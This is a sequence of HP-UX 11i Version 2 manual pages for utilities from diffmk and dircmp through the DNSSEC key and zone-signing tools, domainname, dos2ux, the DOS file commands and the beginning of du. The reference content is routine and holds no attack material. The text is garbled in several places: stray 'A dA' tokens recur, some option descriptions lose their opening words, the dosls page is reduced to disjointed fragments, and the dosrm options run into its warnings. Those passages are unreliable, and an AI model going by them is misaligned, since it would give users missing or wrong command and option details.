/usr/lbin/diff3prog
SEE ALSO
diff(1).
HP-UX 11i Version 2: August 2003 −1− Hewlett-Packard Company Section 1−−179
diffmk(1) diffmk(1)
NAME
diffmk - mark changes between two different versions of a file
SYNOPSIS
diffmk prevfile currfile markfile
DESCRIPTION
diffmk compares the previous version of a file with the current version and creates a file that includes
nroff/troff ‘‘change mark’’ commands. prevfile is the name of the previous version of the file and
currfile is the name of the current version of the file. diffmk generates markfile which contains all the
lines of the currfile plus inserted formatter ‘‘change mark’’ (.mc) requests. When markfile is formatted,
changed or inserted text is shown by a | character at the right margin of each line. The position of
deleted text is shown by a single *.
If the characters | and * are inappropriate, a copy of diffmk can be edited to change them because
A dA diffmk is a shell script.
EXTERNAL INFLUENCES
International Code Set Support
Single- and multi-byte character code sets are supported.
EXAMPLES
A typical command line for comparing two versions of an nroff/troff file and generating a file with
the changes marked is:
diffmk prevfile currfile markfile; nroff markfile | pr
diffmk can also be used to produce listings of C (or other) programs with changes marked. A typical
command line for such use is:
diffmk prevfile.c currfile.c markfile.c; nroff macs markfile.c | pr
where the file macs contains:
.pl 1
.ll 77
.nf
.eo
The .ll request can specify a different line length, depending on the nature of the program being
printed. The .eo request is probably needed only for C programs.
WARNINGS
Aesthetic considerations may dictate manual adjustment of some output.
diffmk does not differentiate between changes in text and changes in formatter request coding. Thus,
file differences involving only formatting changes (such as replacing .sp with .sp 2 in a text source file)
with no change in actual text can produce change marks.
Although unlikely, certain combinations of formatting requests can cause change marks to either disap-
pear or to mark too much. Manual intervention may be required because the subtleties of various format-
ting macro packages and preprocessors is beyond the scope of diffmk. tbl cannot tolerate .mc com-
mands in its input (see tbl (1)), so any .mc request that would appear inside a .TS range is silently
deleted. The script can be changed if this action is inappropriate, or diffmk can be run on two files that
have both been run through the tbl preprocessor before any comparisons are made.
diffmk uses diff, and thus has the same limitations on file size and performance that diff may
impose (see diff(1)). In particular the performance is nonlinear with the size of the file, and very large
files (well over 1000 lines) may take extremely long to process. Breaking the file into smaller pieces may
be advisable.
diffmk also uses the ed(1) editor. If the file is too large for ed, ed error messages may be embedded in
the file. Again, breaking the file into smaller pieces may be advisable.
SEE ALSO
diff(1), nroff(1).
Section 1−−180 Hewlett-Packard Company −1− HP-UX 11i Version 2: August 2003
dircmp(1) dircmp(1)
NAME
dircmp - directory comparison
SYNOPSIS
dircmp [-d] [-s] [-wn ] dir1 dir2
DESCRIPTION
dircmp examines dir1 and dir2 and generates various tabulated information about the contents of the
directories. Sorted listings of files that are unique to each directory are generated for all the options. If
no option is entered, a sorted list is output indicating whether the filenames common to both directories
have the same contents.
-d Compare the contents of files with the same name in both directories and output a list tel-
ling what must be changed in the two files to bring them into agreement. The list format is
described in diff(1).
-s Suppress messages about identical files. A dA
-wn Change the width of the output line to n characters. The default width is 72.
EXTERNAL INFLUENCES
Environment Variables
LC_COLLATE determines the order in which the output is sorted. internationalization variable contains an invalid setting, dircmp behaves
as if all internationalization variables are set to ‘‘C’’ (see environ (5)).
EXAMPLES
Compare the two directories slate and sleet and produce a list of changes that would make the
directories identical:
dircmp -d slate sleet
WARNINGS
This command is likely to be withdrawn from X/Open standards. Applications using this command might
not be portable to other vendors’ systems. As an alternative diff -R is recommended.
SEE ALSO
cmp(1), diff(1).
STANDARDS CONFORMANCE
dircmp: SVID2, SVID3, XPG2, XPG3
HP-UX 11i Version 2: August 2003 −1− Hewlett-Packard Company Section 1−−181
dmpxlt(1) dmpxlt(1)
NAME
dmpxlt - dump iconv translation tables to a readable format
SYNOPSIS
/usr/bin/dmpxlt [-f output_filename ] [input_filename ]
DESCRIPTION
dmpxlt dumps the compiled version of the iconv codeset conversion tables into an ASCII-readable for-
mat that can be modified and used as input to genxlt (1) to regenerate the table for iconv (1).
Options
dmpxlt recognizes the following options:
-f output_filename If this option is not selected, the data will be sent to standard output.
dmpxlt will create an output file in the prescribed format, giving the filecode mapping between the two
A dA code sets, which can be edited and reused by genxlt (1) to create new tables for iconv (1). The entries are
in hexadecimal.
EXTERNAL INFLUENCES
Environment Variables
LANG provides a default value for the internationalization variables that are unset or null. If LANG is
unset or null, the default value of "C" (see lang (5)) is used. If any of the internationalization variables
contains an invalid setting, dmpxlt will behave as if all internationalization variables are set to "C".
See environ (5).
LC_ALL If set to a non-empty string value, overrides the values of all the other internationalization vari-
ables.
LC_MESSAGES determines the locale that should be used to affect the format and contents of diagnostic
messages written to standard error and informative messages written to standard output.
NLSPATH determines the location of message catalogues for the processing of LC_MESSAGES.
RETURN VALUE
The following are exit values:
0 Successful completion.
>0 Error condition occurred.
EXAMPLES
This example creates the source file genxlt_input from the table roma8=iso81:
dmpxlt -f genxlt_input /usr/lib/nls/iconv/tables/roma8=iso81
FILES
/usr/lib/nls/iconv/tables All tables must be installed in this directory.
SEE ALSO
iconv(1), genxlt(1), iconv(3C), environ(5) lang(5).
Section 1−−182 Hewlett-Packard Company −1− HP-UX 11i Version 2: August 2003
dnssec-keygen(1) dnssec-keygen(1)
NAME
dnssec-keygen - key generation tool for DNSSEC
SYNOPSIS
dnssec-keygen [-a algorithm ] [-b keysize ] [-e] [-g generator ] [-h] [-n nametype ]
[-p protocol-value] [-r randomdev ] [-s strength-value] [-t type ] [-v level ] name
DESCRIPTION
dnssec-keygen generates keys for Secure DNS (DNSSEC) as defined in RFC2535. It also generates
keys for use in Transaction Signatures (TSIG) which is defined in RFC2845.
Argument
name Specifies the domain name for which the key is to be generated.
Options
-a algorithm This option is used to specify the encryption algorithm. The algorithm can be
RSAMD5, DH, DSA or HMAC-MD5. RSA can also be used, which is equivalent to
A dA
RSAMD5.
The algorithm argument identifying the encryption algorithm is case-insensitive.
DNSSEC specifies DSA as a mandatory algorithm and RSA as a recommended one.
Implementations of TSIG must support HMAC-MD5.
-b keysize This option is used to determine the number of bits in the key. The choice of key
size depends on the algorithm that is used.
If RSA algorithm is used, keysize must be between 512 and 2048 bits.
If the DH (Diffie-Hellman) algorithm is used, keysize must be between 128 and 4096
bits.
If the DSA (Digital Signature Algorithm) is used, keysize must be between 512 and
1024 bits and a multiple of 64.
If the HMAC-MD5 algorithm is used, keysize should be between 1 and 512 bits.
-e This option is used for generating RSA keys with a large exponent value.
-g generator This option is used when creating Diffie-Hellman keys. The -g option selects the
Diffie-Hellman generator that is to be used. The only supported values for genera-
tor are 2 and 5. If no Diffie-Hellman generator is supplied, a known prime from
RFC2539 will be used if possible; otherwise, 2 will be used as the generator.
-h A summary of the options and arguments to dnssec-keygen is printed by this
option.
-n nametype This option specifies how the generated key will be used.
nametype can be either ZONE, HOST, ENTITY, or USER to indicate that the key will
be used for signing a zone, host, entity or user; respectively. In this context HOST
and ENTITY are identical. nametype is case-insensitive.
-p protocol-value
This option sets the protocol value for the generated key to protocol-value. The
default is 2 (email) for keys of the type USER and 3 (DNSSEC) for all other key
types. Other possible values for this argument are listed in RFC2535 and its suc-
cessors.
-r randomdev This option overrides the behaviour of dnssec-keygen to use random numbers to
seed the process of generating keys when the system does not have a
/dev/random device to generate random numbers. The dnssec-keygen pro-
gram will prompt for keyboard input and use the time intervals between keystrokes
to provide randomness. With this option it will use randomdev as a source of ran-
dom data.
-s strength-value
This option is used to set the key’s strength value. The generated key will sign DNS
resource records with a strength value of strength-value. It should be a number in
the range 0-15. The default strength is zero. The key strength field currently has
no defined purpose in DNSSEC.
HP-UX 11i Version 2: August 2003 −1− Hewlett-Packard Company Section 1−−183
dnssec-keygen(1) dnssec-keygen(1)
-t type This option indicates if the key is used for authentication or confidentiality. type
can be either AUTHCONF, NOAUTHCONF, NOAUTH or NOCONF. The default is
AUTHCONF. If type is AUTHCONF, the key can be used for authentication and
confidentiality. Setting type to NOAUTHCONF indicates that the key cannot be used
for authentication or confidentiality. A value of NOAUTH means the key can be used
for confidentiality but not for authentication. Similarly, NOCONF defines that the
key cannot be used for confidentiality though it can be used for authentication.
-v level This option can be used to make dnssec-keygen more verbose. As the
debugging/tracing level increases, dnssec-keygen generates increasingly
detailed reports about what it is doing. The default level is zero.
Generated Keys
When dnssec-keygen completes, it prints a string in the form Knnnn.+aaa+iiiii on the standard out-
put. This is an identification string for the key it has generated. These strings can be supplied as argu-
A dA ments to the dnssec-makekeyset utility.
The nnnn part is the dot-terminated domain name given by name. The DNSSEC algorithm identifier is
indicated by aaa : 001 for RSA, 002 for Diffie-Hellman, 003 for DSA, or 157 for HMAC-MD5. iiiii is a
five-digit number identifying the key.
dnssec-keygen creates two files. The file names are adapted from the key identification string above.
They have names in the form:
Knnnn.+aaa+iiiii. key and
Knnnn.+aaa+iiiii. private.
These contain the public and private parts of the key respectively. The files generated by dnssec-
keygen follow this naming convention to make it easy for the signing tool dnssec-signzone to iden-
tify which file(s) have to be read to find the necessary key(s) for generating or validating signatures.
The .key file contains a KEY resource record that can be inserted into a zone file with a $INCLUDE
statement. The private part of the key is in the .private file. It contains details of the encryption
algorithm that was used and any relevant parameters: prime number, exponent, modulus, subprime, etc.
For obvious security reasons, this file does not have general read permission. The private part of the key
is used by dnssec-signzone to generate signatures and the public part is used to verify the signa-
tures. Both .key and .private key files are generated by symmetric encryption algorithm such as
HMAC-MD5, even though the public and private key are equivalent.
EXAMPLE
To generate a 768-bit DSA key for the domain example.com, the following command would be issued:
dnssec-keygen -a DSA -b 768 -n ZONE example.com
dnssec-keygen has printed the key identification string Kexample.com.+003+26160, indicating a
DSA key with identifier 26160. It would have created the files
Kexample.com.+003+26160.key and
Kexample.com.+003+26160.private
containing the public and private keys respectively for the generated DSA key.
FILES
/dev/random
SEE ALSO
dnssec-makekeyset(1), dnssec-signkey(1), dnssec-signzone(1), RFC2535, RFC2845, RFC2539.
BUGS
The naming convention for the public and private key files is a little clumsy. It won’t work for domain
names that are longer than 236 characters because the .+aaa+iiiii .private suffix results in filenames
that are too long for most UNIX systems.
Section 1−−184 Hewlett-Packard Company −2− HP-UX 11i Version 2: August 2003
dnssec-makekeyset(1) dnssec-makekeyset(1)
NAME
dnssec-makekeyset - used to produce a set of DNSSEC keys
SYNOPSIS
dnssec-makekeyset [-a] [-h help ] [-s start-time ] [-e end-time ] [-t TTL] [-r randomdev ]
[-p] [-v level ] keyfile ...
DESCRIPTION
dnssec-makekeyset generates a key set from one or more keys created by dnssec-keygen. It
creates a file containing KEY and SIG records for some zone which can then be signed by the zone’s
parent if the parent zone is DNSSEC-aware.
keyfile should be a key identification string as reported by dnssec-keygen; such as, Knnnn.+aaa+iiiii,
where nnnn is the name of the key, aaa is the encryption algorithm and iiiii is the key identifier. Multi-
ple keyfile arguments can be supplied when there are several keys to be combined by dnssec-
makekeyset into a key set. A dA
Options
-a This option is used to verify all generated signatures.
-e end-time The expiration date for the SIG records can be set by the -e option. Note that in
this context, the expiration date specifies when the SIG records are no longer valid,
not when they are deleted from caches on name servers..
When no expiration date is set for the SIG records, dnssec-makekeyset
defaults to an expire time of 30 days from the start time of the SIG records.
-h help This option is used to display a short summary of the options provided with
dnssec-makekeyset.
-p This option is used to instruct dnssec-makekeyset to use pseudo-random data
when self-signing the keyset. This is faster, but less secure, than using genuinely
random data for signing. This option may be useful when the entropy source is lim-
ited.
-r randomdev An alternate source of random data can be specified with the -r option. randomdev
is the name of the file to use to obtain random data. By default, /dev/random is
used if this device is available. If this file is not provided by the operating system
and no -r option is used, dnssec-makekeyset will prompt the user for input
from the keyboard and use the time between keystrokes to derive some random
data.
-s start-time For any SIG records that are in the key set, the start time when the SIG records
become valid is specified with the -s option. -s option is supplied, the current date and time is used for the start time of
the SIG records.
-t TTL The -t option is followed by a time-to-live argument TTL which indicates the TTL
value that will be assigned to the assembled KEY and SIG records in the output file.
TTL is expressed in seconds. If no -t option is provided, dnssec-makekeyset
prints a warning and uses a default TTL of 3600 seconds.
-v level This option can be used to make dnssec-makekeyset more verbose. As the
debugging/tracing level level increases, dnssec-makekeyset generates increas-
ingly detailed reports about what it is doing. The default level is zero.
HP-UX 11i Version 2: August 2003 −1− Hewlett-Packard Company Section 1−−185
dnssec-makekeyset(1) dnssec-makekeyset(1)
If dnssec-makekeyset is successful, it creates a file name of the form nnnn .keyset. This file
contains the KEY and SIG records for domain nnnn, the domain name part from the key file
identifier produced when dnssec-keygen created the domain’s public and private keys. The
.keyset file can then be transferred to the DNS administrator of the parent zone for them to sign
the contents with dnssec-signkey.
EXAMPLE
The following command generates a key set for the DSA key for example.com that was shown in the
dnssec-keygen man page. (Note the backslash is simply a line continuation character and not part of
the dnssec-makekeyset command syntax.)
dnssec-makekeyset -t 86400 -s 20000701120000 -e +2592000 \
Kexample.com.+003+26160
dnssec-makekeyset will create a file called example.com.keyset containing a SIG and KEY
A dA record for example.com. These records will have a TTL of 86400 seconds (1 day). The SIG record
becomes valid at noon UTC on July 1st 2000 and expires 30 days (2592000 seconds) later.
The DNS administrator for example.com could then send example.com.keyset to the DNS
administrator for .com so that they could sign the resource records in the file. This assumes that the
.com zone is DNSSEC-aware and the administrators of the two zones have some mechanism for authen-
ticating each other and exchanging the keys and signatures securely.
FILES
/dev/random
SEE ALSO
dnssec-keygen(1), dnssec-signkey(1), dnssec-signzone(1), RFC2535.
Section 1−−186 Hewlett-Packard Company −2− HP-UX 11i Version 2: August 2003
dnssec-signkey(1) dnssec-signkey(1)
NAME
dnssec-signkey - DNSSEC keyset signing tool
SYNOPSIS
dnssec-signkey [-a] [-c class ] [-e end-time ] [-h] [-p] [-r randomdev ] [-s start-time ]
[-v level ] keyset keyfile ...
DESCRIPTION
dnssec-signkey is used to sign a key set for a child zone. Typically this would be provided by a
.keyset file generated by the dnssec-makekeyset utility. This provides a mechanism for a
DNSSEC-aware zone to sign the keys of any DNSSEC-aware child zones. The child zone’s key set gets
signed with the zone keys for its parent zone.
keyset will be the pathname of the child zone’s .keyset file.
Each keyfile argument will be a key identification string as reported by dnssec-keygen for the parent
zone. This allows the child’s keys to be signed by more than one parent zone key. A dA
Options
-a This option verifies all generated signatures.
-c class This option specifies the DNS class of the key sets. Currently only IN class is sup-
ported.
-e end-time This option specifies the date and time when the generated-SIG records expire.. If no end-time is specified, 30 days from the
start time is used as a default.
-h This option makes dnssec-signkey print a summary of its command line
options and arguments.
behavior of dnssec-signkey to use random numbers to
seed the process of generating keys when the system does not have a
/dev/random device to generate random numbers. The dnssec-signkey pro-
gram will prompt for keyboard input and use the time intervals between keystrokes
to provide randomness. With this option, it will use randomdev as a source of ran-
dom data.
-s start-time This option specifies the date and time when the generated SIG records become
valid. start-time is specified, the current time is
used.
-v level This option can be used to make dnssec-signkey more verbose. As the
debugging/tracing level increases, dnssec-signkey generates increasingly
detailed reports about what it is doing. The default level is zero.
When dnssec-signkey completes successfully, it generates a file called nnnn .signedkey containing
the signed keys for child zone nnnn. The keys from the keyset file would have been signed by the
parent zone’s key or keys which were supplied as keyfile arguments. This file should be sent to the
DNS administrator of the child zone. They arrange for its contents to be incorporated into the zone file
HP-UX 11i Version 2: August 2003 −1− Hewlett-Packard Company Section 1−−187
dnssec-signkey(1) dnssec-signkey(1)
when it next gets signed with dnssec-signzone. A copy of the generated signedkey file should be
kept by the parent zone’s DNS administrator, since it will be needed when signing the parent zone.
EXAMPLE
The DNS administrator for a DNSSEC-aware .com zone would use the following command to make
dnssec-signkey sign the .keyset file for example.com created in the example shown in the man
page for dnssec-makekeyset:
dnssec-signkey example.com.keyset Kcom.+003+51944
where Kcom.+003+51944 was a key file identifier that was produced when dnssec-keygen gen-
erated a key for the .com zone.
dnssec-signkey will produce a file called example.com.signedkey which has the keys for
example.com signed by the com zone’s zone key.
A dA FILES
/dev/random
SEE ALSO
dnssec-keygen(1), dnssec-makekeyset(1), dnssec-signzone(1), RFC2535.
Section 1−−188 Hewlett-Packard Company −2− HP-UX 11i Version 2: August 2003
dnssec-signzone(1) dnssec-signzone(1)
NAME
dnssec-signzone - DNSSEC zone signing tool
SYNOPSIS
dnssec-signzone [-a] [-c cycle-time ] [-d directory ] [-e end-time ] [-f output-file ] [-h]
[-i interval ] [-n ncpus ] [-o origin ] [-p] [-r randomdev ] [-s start-time ] [-t]
[-v level ] zonefile keyfile ....
DESCRIPTION
dnssec-signzone is used to sign a zone. Any .signedkey files for the zone to be signed should be
present in the current directory, along with the keys that will be used to sign the zone.
Arguments
zonefile This is the name of the unsigned zone file.
keyfile If no keyfile arguments are supplied, the default behaviour is to use all of the zone’s keys
that are present in the current directory. Providing specific keyfile arguments constrains
A dA
dnssec-signzone to only use those keys for signing the zone. Each keyfile argument
would be an identification string for a key created with dnssec-keygen.
If the zone to be signed has any secure subzones, the .signedkey files for those subzones need to be
available in the current working directory used by dnssec-signzone.
Options
-a This option is used to force verification of the signatures generated by dnssec-
signzone. By default the signature files are not verified.
-c cycle-time
This option is used to configure the cycle period which is used for resigning records when
a previously signed zone is passed as input to dnssec-signzone. The cycle period is
an offset from the current time (in seconds). If a SIG record expires after the cycle
period, it is retained. Otherwise, it is considered to be expiring soon, and dnssec-
signzone will remove it and generate a new SIG record to replace it.
-d directory
This option is used to look for signedkey files in directory as the directory.
-e end-time
This option is used to set the expiration time for the SIG records. The expiration time
specifies when the SIG records are no longer valid, not when they are deleted from caches
on name servers. end-time can represent an absolute or relative date.
The YYYYMMDDHHMMSS notation is used to indicate an absolute date and time.
When end-time is +N, it indicates that the SIG records will expire in N seconds after
their start time.
-f output-file
This option is used to override the use of the default signed zone file,
zonefile.signed by dnssec-signzone.
-h This option is used to print a short summary of the options and arguments to dnssec-
signzone.
-i interval
When a previously signed zone is passed as input, records may be resigned. The interval
option specifies the cycle interval as an offset from the current time (in seconds). If a SIG
record expires after the cycle interval, it is retained. Otherwise, it is considered to be
expiring soon, and it will be replaced.
The default cycle interval is one quarter of the difference between the signature end and
start times. So if neither end-time nor start-time is specified, dnssec-signzone gen-
erates signatures that are valid for 30 days, with a cycle interval of 7.5 days. Therefore,
if any existing SIG records are due to expire in less than 7.5 days, they would be
replaced.
-n ncpus This option can be used to create worker threads equal to ncpus to take advantage of
multiple CPUs. If no option is given, named will try to determine the number of CPUs
present and create one thread per CPU.
HP-UX 11i Version 2: August 2003 −1− Hewlett-Packard Company Section 1−−189
dnssec-signzone(1) dnssec-signzone(1)
-o origin This option specifies the zone origin. If not specified, the name of the zone file is assumed
to be the origin .
behaviour of dnssec-signzone to use random numbers to
seed the process of signing the zone. If the system does not have a /dev/random device
to generate random numbers, the dnssec-signzone program will prompt for key-
board input and use the time intervals between keystrokes to provide randomness. With
EXAMPLE
The example below shows how dnssec-signzone could be used to sign the example.com zone with
the key that was generated in the example given in the man page for dnssec-keygen. The zone file for
this zone is example.com, which is the same as the origin, so there is no need to use the -o option to
set the origin. This zone file contains the key set for example.com that was created by dnssec-
makekeyset. The zone’s keys are either appended to the zone file or incorporated using a $INCLUDE
statement. If there was a .signedkey file from the parent zone; i.e., example.com.signedkey, it
should be present in the current directory. This allows the parent zone’s signature to be included in the
signed version of the example.com zone.
dnssec-signzone example.com Kexample.com.+003+26160
dnssec-signzone will create a file called example.com.signed, the signed version of the
example.com zone. This file can then be referenced in a zone{} statement in /etc/named.conf so
that it can be loaded by the name server.
FILES
/dev/random
SEE ALSO
dnssec-keygen(1), dnssec-makekeyset(1), dnssec-signkey(1), RFC2535.
Section 1−−190 Hewlett-Packard Company −2− HP-UX 11i Version 2: August 2003
domainname(1) domainname(1)
NAME
domainname - set or display name of Network Information Service domain
SYNOPSIS
domainname [ name_of_domain ]
DESCRIPTION
Network Information Service (NIS) uses domain names to refer collectively to a group of hosts. Without
an argument, domainname displays the name of the NIS domain. Only superuser can set the domain
name by providing name_of_domain. The domain name is usually set in the configuration file
/etc/rc.config.d/namesvrs, by setting the NIS_DOMAIN variable.
DEPENDENCIES
NIS servers use the NIS domain name as the name of a subdirectory of /var/yp. For this,
name_of_domain should not be a . or .. and it should not contain /. Since the NIS domain name can
be as long as 64 characters, name_of_domain may exceed the maximum file name length allowed on a A dA
given file system. If that length is exceeded, the subdirectory name becomes a truncated version of the
NIS domain name.
The first 14 characters of all NIS domains on the network must be unique: truncated names should be
checked to verify that they meet this requirement.
AUTHOR
domainname was developed by Sun Microsystems, Inc.
SEE ALSO
ypinit(1M), getdomainname(2), setdomainna(2).
HP-UX 11i Version 2: August 2003 −1− Hewlett-Packard Company Section 1−−191
dos2ux(1) dos2ux(1)
NAME
dos2ux, ux2dos - convert ASCII file format
SYNOPSIS
dos2ux file ...
ux2dos file ...
DESCRIPTION
dos2ux and ux2dos read each specified file in sequence and write it to standard output, converting to
HP-UX format or to DOS format, respectively. Each file can be either DOS format or HP-UX format for
either command.
A DOS file name is recognized by the presence of an embedded colon (:) delimiter; see dosif (4) for DOS
file naming conventions.
A dA If no input file is given or if the argument - is encountered, dos2ux and ux2dos read from standard
input. Standard input can be combined with other files.
EXAMPLES
Print file myfile on the display:
dos2ux myfile
Convert file1 and file2 to DOS format then concatenate them together, placing them in file3.
ux2dos file1 file2 > file3
RETURN VALUE
dos2ux and ux2dos return 0 if successful or 2 if the command failed. The only possible failure is the
inability to open a specified file, in which case the commands print a warning.
WARNINGS
Command formats resembling:
dos2ux file1 file2 > file1
overwrite the data in file1 before the concatenation begins, causing a loss of the contents of file1.
Therefore, be careful when using shell special characters.
SEE ALSO
doschmod(1), doscp(1), dosdf(1), dosls(1), dosmkdir(1), dosrm(1), dosif(4).
Section 1−−192 Hewlett-Packard Company −1− HP-UX 11i Version 2: August 2003
doschmod(1) doschmod(1)
(TO BE OBSOLETED)
NAME
doschmod - change attributes of a DOS file
SYNOPSIS
doschmod [-mu] mode device : file ...
DESCRIPTION
The doschmod command is targeted for removal from HP-UX; see the WARNINGS below.
doschmod is the DOS counterpart of chmod (see chmod(1)).
Options
doschmod recognizes one option:
-m If an ordinary file with the same name as volume label exists, operation will be performed on
the file instead of.
The attributes of each named file are changed according to mode, which is an octal number in the range
000 to 0377. mode is constructed from the logical OR of the following modes:
200 Reserved. Do not use.
100 Reserved. Do not use.
040 Archive. Set whenever the file has been written to and closed.
020 Directory. Do not modify.
010 Volume Label. Do not modify.
004 System file. Marks files that are part of the DOS operating system.
002 Hidden file. Marks files that do not appear in a DOS directory listing using the DOS DIR
command.
001 Read-Only file. Marks files as read-only.
WARNINGS
Use of doschmod is discouraged because it is targeted for removal from HP-UX.
Specifying inappropriate mode values can make files and/or directories inaccessible, and in certain cases
can damage the file system. To prevent such problems, do not change the mode of directories and volume
labels.
Normal users should have no need to use mode bits other than 001, 002, and 040.
EXAMPLES
Mark file /dev/rfd9122:memo.txt as a hidden file:
doschmod 002 /dev/rfd9122:memo.txt
Mark file driveC:autoexec.bat read-only:
doschmod 001 driveC:autoexec.bat
SEE ALSO
chmod(1), dos2ux(1), doscp(1), dosdf(1), dosls(1), dosmkdir(1), dosrm(1), chmod(2), dosif(4).
HP-UX 11i Version 2: August 2003 −1− Hewlett-Packard Company Section 1−−193
doscp(1) doscp(1)
(TO BE OBSOLETED)
NAME
doscp - copy to or from DOS files
SYNOPSIS
doscp [-fmvu] file1 file2
doscp [-fmvu] file1 [ file2 ... ] directory
DESCRIPTION
The doscp command is targeted for removal from HP-UX; see the WARNINGS below.
doscp is the DOS counterpart of cp (see cp (1)). doscp copies a DOS file to a DOS or HP-UX file, an
HP-UX file to an HP-UX or DOS file, or HP-UX or DOS files to an HP-UX or DOS directory. The last name in
the argument list is the destination file or directory.
A DOS file name is recognized by the presence of an embedded colon (:) delimiter; see dosif (4) for DOS
A dA file naming conventions.
Metacharacters *, ?, and [ ... ] can be used when specifying both HP-UX and DOS file names. These
must be quoted when specifying a DOS file name, because file name expansion must be performed by the
DOS utilities, not by the shell. DOS utilities expand file names as described in regexp (5) under PATTERN
MATCHING NOTATION.
The file name - (dash) is interpreted to mean standard input or standard output depending upon its
position in the argument list.
Options
doscp recognizes the following options:
-f Unconditionally write over an existing file. In the absence of this option, doscp asks per-
mission to overwrite an existing HP-UX file.
-v Verbose mode. doscp prints the source name.
-u Disable argument case conversion. In the absence of this option, all DOS file names are con-
verted to upper case.
-m In this case you may have a filename same as DOS volume label.
RETURN VALUE
doscp returns 0 if all files are copied successfully. Otherwise, it prints a message to standard error and
returns with a non-zero value.
EXAMPLES
Copy the files in the HP-UX directory abc to the DOS volume stored as HP-UX file hard_disk:
doscp abc/* hard_disk:
Copy DOS file /backup/log through the HP-UX special file /dev/rfd9127 to HP-UX file logcopy
located in the current directory:
doscp /dev/rfd9127:/backup/log logcopy
Copy DOS file zulu on the volume stored as HP-UX file bb to standard output:
doscp bb:zulu -
Copy all files in directory /dameron with extension txt in the DOS volume /dev/rdsk/c1t2d0 to
the HP-UX directory abacus located in the current directory:
doscp ’/dev/rdsk/c1t2d0:/dameron/*.txt’ abacus
WARNINGS
Use of doscp is discouraged because it is targeted for removal from HP-UX. Use dos2ux (1) instead.
doscp works more reliably if you use a raw device special file (/dev/rdsk/) than a block device special
file.
To use SCSI floppy disk devices, the sflop device driver must be configured into the kernel. (You can
use the ioscan command to verify the configuration.)
Section 1−−194 Hewlett-Packard Company −1− HP-UX 11i Version 2: August 2003
doscp(1) doscp(1)
(TO BE OBSOLETED)
SEE ALSO
cp(1), dos2ux(1), doschmod(1), dosdf(1), dosls(1), dosmkdir(1), dosrm(1), ioscan(1M) dosif(4).
A dA
HP-UX 11i Version 2: August 2003 −2− Hewlett-Packard Company Section 1−−195
dosdf(1) dosdf(1)
(TO BE OBSOLETED)
NAME
dosdf - report number of free disk clusters
SYNOPSIS
dosdf device[:]
DESCRIPTION
The dosdf command is targeted for removal from HP-UX; see the WARNINGS below.
dosdf is the DOS counterpart of the df command (see df(1)). It prints the cluster size in bytes and the
number of free clusters on the specified DOS volume.
WARNINGS
Use of dosdf is discouraged because it is targeted for removal from HP-UX.
A dA SEE ALSO
df(1), dos2ux(1), doschmod(1), doscp(1), dosls(1), dosmkdir(1), dosrm(1), dosif(4).
Section 1−−196 Hewlett-Packard Company −1− HP-UX 11i Version 2: August 2003
dosls(1) dosls(1)
(TO BE OBSOLETED)
NAME
dosls, dosll - list contents of DOS directories
SYNOPSIS
dosls [-aAmudl] device :[ file ] ...
dosll [-aAmudl] device :[ file ] ...
DESCRIPTION
A dA con-
verted.ls and dosll is discouraged because they are targeted for removal from HP-UX.
EXAMPLES
These examples assume that a DOS directory structure exists on the device accessed through HP-UX spe-
cial
dos2ux(1), doschmod(1), doscp(1), dosdf(1), dosmkdir(1), dosrm(1), ls(1), dosif(4).
HP-UX 11i Version 2: August 2003 −1− Hewlett-Packard Company Section 1−−197
dosmkdir(1) dosmkdir(1)
(TO BE OBSOLETED)
NAME
dosmkdir - make a DOS directory
SYNOPSIS
dosmkdir [-mu] device :directory ...
DESCRIPTION
The dosmkdir command is targeted for removal from HP-UX; see the WARNINGS below.
dosmkdir is the DOS counterpart of the mkdir command (see mkdir (1)). It creates specified direc-
tories. The standard entries, . for the directory itself and .. for its parent, are made automatically.
There is one option:
-m In this case you may have a directory name same as DOS.
DIAGNOSTICS
dosmkdir returns 0 if all directories were successfully created. Otherwise, it prints a message to stan-
dard error and returns non-zero.
WARNINGS
Use of dosmkdir is discouraged because it is targeted for removal from HP-UX.
EXAMPLES
Create an empty subdirectory named numbers under the directory /math/lib on the device accessed
through HP-UX special file /dev/rfd9122:
dosmkdir /dev/rfd9122:/math/lib/numbers
SEE ALSO
dos2ux(1), doschmod(1), doscp(1), dosdf(1), dosls(1), dosrm(1), mkdir(1), dosif(4).
Section 1−−198 Hewlett-Packard Company −1− HP-UX 11i Version 2: August 2003
dosrm(1) dosrm(1)
(TO BE OBSOLETED)
NAME
dosrm, dosrmdir - remove DOS files or directories
SYNOPSIS
dosrm [-fmriu] device :file ...
dosrmdir [-mu] device :file ...
DESCRIPTION
The dosrm and dosrmdir commands are targeted for removal from HP-UX; see the WARNINGS
below.
dosrm and dosrmdir are DOS counterparts of rm and rmdir (see rm(1) and rmdir (1), respectively).
dosrm removes the entries for one or more files from a directory. If a specified file is a directory, an
error message is printed unless the optional argument -r is specified (see below).
dosrmdir removes entries for the named directories, provided they are empty. A dA
Options
dosrm and dosrmdir recognize the following options:
-f (force) Unconditionally remove the specified file, even if the file is marked read-only.
-r Cause dosrm to recursively delete the entire contents of a directory, followed by the direc-
tory itself. dosrm can recursively delete up to 17 levels of directories.
-i (interactive) Cause dosrm to ask whether or not to delete each file. If -r is also specified,
dosrm asks whether to examine each directory encountered.
-m If an ordinary file with the same name as volume label exists, operation will be performed on
the file instead of volume label.
-u Disable argument case conversion. In the absence of this option, all DOS file names are con-rm and dosrmdir is discouraged because they are targeted for removal from HP-UX.
EXAMPLES
These examples assume that a DOS directory structure exists on the device accessed through the HP-UX
special file /dev/rfd9122.
Recursively comb through the DOS directory /tmp and ask if each DOS file should be removed forcibly
(that is, with no file mode checks):
dosrm -irf /dev/rfd9122:/tmp
Remove the DOS directory doug from the DOS volume stored as HP-UX file hard_disk:
dosrmdir hard_disk:doug
SEE ALSO
dos2ux(1), doschmod(1), doscp(1), dosdf(1), dosls(1), dosmkdir(1), rm(1), rmdir(1), dosif(4).
HP-UX 11i Version 2: August 2003 −1− Hewlett-Packard Company Section 1−−199
du(1) du(1)
NAME
du - summarize disk usage
SYNOPSIS
du [-a-s] [-bkrx] [-t type ] [ name ... ]
DESCRIPTION
The du command gives the number of 512-byte blocks allocated for all files and (recursively) directories
within each directory and file specified by the name operands. The block count includes the indirect
blocks of the file. A file with two or more links is counted only once. If name is missing, the current
working directory is used.
By default, du generates an entry only for the name operands and each directory contained within those
hierarchies.
A dA Options
The du command recognizes the following options:
-a Print entries for each file encountered in the directory hierarchies in addition to the
normal output.
-b For each name operand that is a directory for which file system swap has been
enabled, print the number of blocks the swap system is currently using.
-k Gives the block count in 1024-byte blocks.
-r Print messages about directories that cannot be read, files that cannot be accessed,
etc. du is normally silent about such conditions.
